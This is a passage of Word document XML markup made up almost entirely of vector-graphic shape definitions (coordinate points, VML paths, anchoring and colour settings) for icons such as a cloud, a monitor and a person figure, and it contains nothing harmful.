                              <a:lnTo>
                                <a:pt x="82511" y="538784"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="54889" y="571220"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="41960" y="613702"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="853960"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="114" y="869022"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4038" y="883310"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="11455" y="896124"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="22098" y="906792"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="117894" y="969962"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="117894" y="667372"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="122885" y="642670"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="136486" y="622503"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="156667" y="608901"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="181381" y="603923"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="713232" y="603923"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="737946" y="608901"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="758126" y="622503"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="771728" y="642670"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="776719" y="667372"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="776719" y="962279"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="877697" y="898969"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="885621" y="891895"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="891311" y="883158"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="894524" y="873226"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="895032" y="86262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F6FC66" id="Graphic 74" o:spid="_x0000_s1026" style="position:absolute;margin-left:121.7pt;margin-top:134pt;width:70.5pt;height:84.2pt;z-index:-15716352;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:0;mso-wrap-distance-top:0;mso-wrap-distance-right:0;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:page;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" coordsize="89535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" path="m671271,223621r-4547,-45072l653694,136575,633056,98590,605739,65493,572617,38188,534619,17564,492607,4533,447522,,402424,4533,360426,17564,322414,38188,289293,65493,261975,98590r-20637,37985l228307,178549r-4546,45072l228307,268681r13031,41986l261975,348653r27318,33096l322414,409054r38012,20612l402424,442696r45098,4547l492607,442696r42012,-13030l572617,409054r33122,-27305l633056,348653r20638,-37986l666724,268681r4547,-45060xem855738,1015669r-106565,l749173,928458r,-9791l749173,761860r,-2388l749173,667372r-2794,-13818l738771,642277r-11290,-7620l713651,631875r-96076,l617575,840257r-78460,78410l519404,898969r58598,-58712l519404,781558r19711,-19698l617575,840257r,-208382l492683,631875r,138367l427240,928458r-23520,-9791l401370,917689,465975,761860r978,-2388l492683,770242r,-138367l375081,631875r,149683l316484,840257r58597,58712l355358,918667,276898,840257r78460,-78397l375081,781558r,-149683l181800,631875r-13818,2782l156692,642277r-7620,11277l146278,667372r,348297l39293,1015669r,17755l42125,1047216r7620,11265l61023,1066088r13792,2832l820216,1068920r13805,-2832l845286,1058481r7620,-11265l855738,1033424r,-17755xem895032,862622l853084,613702,839736,572503,812520,538784,766432,510311,717981,486308,667512,466915,590588,447382r-45174,23140l497522,484403r-49238,4635l399046,484403,351167,470522,305993,447382r-25171,4611l228561,467194r-50660,19609l129133,510717,82511,538784,54889,571220,41960,613702,,853960r114,15062l4038,883310r7417,12814l22098,906792r95796,63170l117894,667372r4991,-24702l136486,622503r20181,-13602l181381,603923r531851,l737946,608901r20180,13602l771728,642670r4991,24702l776719,962279,877697,898969r7924,-7074l891311,883158r3213,-9932l895032,862622xe" fillcolor="black" stroked="f">
                <v:path arrowok="t"/>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487600640" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4015DCE2" wp14:editId="21C7AD89">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2526029</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>283299</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8335009" cy="296418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5009" cy="2964180"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8335009" cy="2964180"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="76" name="Graphic 76"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6596829" y="1447454"/>
                            <a:ext cx="1737995" cy="1478280"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="1737995" h="1478280">
                                <a:moveTo>
                                  <a:pt x="1259941" y="1347575"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="477908" y="1347575"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="477908" y="1477985"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1259941" y="1477985"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1259941" y="1347575"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="1737995" h="1478280">
                                <a:moveTo>
                                  <a:pt x="1042710" y="1217164"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="695140" y="1217164"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="695140" y="1347575"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1042710" y="1347575"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1042710" y="1217164"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="1737995" h="1478280">
                                <a:moveTo>
                                  <a:pt x="1650957" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="86892" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="53153" y="6860"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25524" y="25538"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6856" y="53183"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="86940"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1130224"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6856" y="1163981"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25524" y="1191625"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="53153" y="1210304"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="86892" y="1217164"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1650957" y="1217164"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1684696" y="1210304"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1712325" y="1191625"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1730994" y="1163981"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1737850" y="1130224"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1737850" y="1086754"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="130338" y="1086754"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="130338" y="130410"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1737850" y="130410"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1737850" y="86940"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1730994" y="53183"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1712325" y="25538"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1684696" y="6860"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1650957" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="1737995" h="1478280">
                                <a:moveTo>
                                  <a:pt x="1737850" y="130410"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1607511" y="130410"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1607511" y="1086754"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1737850" y="1086754"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1737850" y="13041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4019737" y="1512244"/>
                            <a:ext cx="2388870" cy="1445260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2388870" h="1445260">
                                <a:moveTo>
                                  <a:pt x="216727" y="475559"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="213298" y="433866"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="216601" y="393136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="226254" y="353782"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="241878" y="316217"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="263092" y="280853"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="289514" y="248102"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="320766" y="218379"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="356465" y="192095"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="396232" y="169664"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="439686" y="151498"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="486446" y="138009"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="536132" y="129611"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="585861" y="126805"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="635253" y="129443"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="683671" y="137420"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="730473" y="150635"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="775019" y="168981"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="804056" y="132251"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="839529" y="101243"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="880312" y="76243"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="925278" y="57537"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="973301" y="45410"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1023253" y="40147"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1074008" y="42034"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1124438" y="51355"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1173418" y="68397"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1209502" y="87003"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1241871" y="109799"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1267949" y="75736"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1300736" y="47506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1338928" y="25467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1381222" y="9977"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1426314" y="1393"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1472900" y="71"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1519677" y="6370"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1565340" y="20645"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1611378" y="45331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1649414" y="77922"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1683917" y="50000"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1722790" y="28172"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1764966" y="12513"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1809377" y="3097"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1854958" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1900639" y="3293"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1945355" y="13053"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1988038" y="29354"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2027620" y="52268"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2060253" y="79361"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2086564" y="110419"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2106041" y="144691"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2118171" y="181427"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2168051" y="196701"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2212568" y="218420"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2251140" y="245741"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2283184" y="277819"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2308115" y="313810"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2325351" y="352868"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2334308" y="394150"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2334404" y="436810"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2325054" y="480004"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2322201" y="488148"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2318990" y="496197"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2315446" y="504150"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2311592" y="512008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2342052" y="550170"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2364852" y="590571"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2380099" y="632542"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2387896" y="675413"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2388350" y="718514"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2381565" y="761176"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2367648" y="802727"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2346704" y="842500"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2318837" y="879823"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2284153" y="914028"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2242758" y="944443"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2202823" y="966464"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2159970" y="984020"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2114760" y="996932"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2067752" y="1005022"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2063158" y="1047700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2050654" y="1088126"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2030906" y="1125763"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2004575" y="1160074"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1972328" y="1190522"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1934826" y="1216569"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1892734" y="1237678"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1846716" y="1253313"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1797434" y="1262935"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1745553" y="1266007"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1701695" y="1263241"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1658908" y="1255593"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1617787" y="1243183"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1578929" y="1226129"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1561004" y="1265347"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1537442" y="1301368"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1508798" y="1333945"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1475627" y="1362833"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1438483" y="1387788"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1397923" y="1408565"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1354499" y="1424918"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1308767" y="1436601"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1261283" y="1443371"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1212599" y="1444981"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1163272" y="1441187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1113855" y="1431742"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1065702" y="1416684"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1020841" y="1396438"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="979850" y="1371365"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="943310" y="1341822"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="911798" y="1308171"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="867681" y="1327324"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="822165" y="1341843"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="775687" y="1351819"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="728687" y="1357342"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="681605" y="1358503"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="634879" y="1355391"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="588949" y="1348097"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="544252" y="1336711"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="501229" y="1321324"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="460319" y="1302025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="421960" y="1278905"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="386592" y="1252054"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="354653" y="1221563"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="326582" y="1187521"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="323534" y="1183330"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="322010" y="1181171"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="273237" y="1181854"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="226697" y="1174746"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="183466" y="1160548"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="144623" y="1139960"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="111245" y="1113680"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="84409" y="1082409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="65194" y="1046846"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="54675" y="1007689"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="54290" y="964569"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="65121" y="922853"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="86572" y="883995"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="118048" y="849447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="73791" y="821875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="39338" y="787819"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="15208" y="748910"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1922" y="706782"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="663068"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9960" y="619401"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="32323" y="577413"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66429" y="540032"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="109524" y="510675"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="159643" y="490367"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214822" y="480131"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="216727" y="475559"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2388870" h="1445260">
                                <a:moveTo>
                                  <a:pt x="260542" y="870402"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="224050" y="870468"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="188152" y="865973"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="153493" y="857026"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="120715" y="843732"/>
                                </a:lnTo>
                              </a:path>
                              <a:path w="2388870" h="1445260">
                                <a:moveTo>
                                  <a:pt x="384113" y="1162121"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="369191" y="1166572"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="353983" y="1170202"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="338536" y="1172998"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="322899" y="1174948"/>
                                </a:lnTo>
                              </a:path>
                              <a:path w="2388870" h="1445260">
                                <a:moveTo>
                                  <a:pt x="911671" y="1302329"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="901057" y="1288381"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="891336" y="1273993"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="882543" y="1259199"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="874714" y="1244036"/>
                                </a:lnTo>
                              </a:path>
                              <a:path w="2388870" h="1445260">
                                <a:moveTo>
                                  <a:pt x="1593915" y="1157168"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1591774" y="1173383"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1588597" y="1189442"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1584396" y="1205335"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1579183" y="1221049"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="12700">
                            <a:solidFill>
                              <a:srgbClr val="6FAC46"/>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32" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="5900165" y="2268601"/>
                            <a:ext cx="192277" cy="246590"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="79" name="Graphic 79"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4236592" y="1585467"/>
                            <a:ext cx="2093595" cy="525145"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2093595" h="525145">
                                <a:moveTo>
                                  <a:pt x="2093595" y="435229"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2078414" y="460363"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2059876" y="483806"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2038195" y="505344"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2013584" y="524764"/>
                                </a:lnTo>
                              </a:path>
                              <a:path w="2093595" h="525145">
                                <a:moveTo>
                                  <a:pt x="1901698" y="103251"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1903674" y="113752"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1905031" y="124301"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1905769" y="134897"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1905888" y="145542"/>
                                </a:lnTo>
                              </a:path>
                              <a:path w="2093595" h="525145">
                                <a:moveTo>
                                  <a:pt x="1390903" y="53975"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1399349" y="39576"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1409033" y="25749"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1419907" y="12541"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1431925" y="0"/>
                                </a:lnTo>
                              </a:path>
                              <a:path w="2093595" h="525145">
                                <a:moveTo>
                                  <a:pt x="1007618" y="79629"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1011287" y="67633"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1015825" y="55864"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1021244" y="44356"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1027556" y="33147"/>
                                </a:lnTo>
                              </a:path>
                              <a:path w="2093595" h="525145">
                                <a:moveTo>
                                  <a:pt x="557910" y="95377"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="577070" y="105296"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="595455" y="116157"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="613007" y="127898"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="629666" y="140462"/>
                                </a:lnTo>
                              </a:path>
                              <a:path w="2093595" h="525145">
                                <a:moveTo>
                                  <a:pt x="12446" y="449834"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="8447" y="438144"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5032" y="426323"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2212" y="414383"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="402336"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="12700">
                            <a:solidFill>
                              <a:srgbClr val="6FAC46"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="80" name="Graphic 80"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1908301"/>
                            <a:ext cx="4021454" cy="111125"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
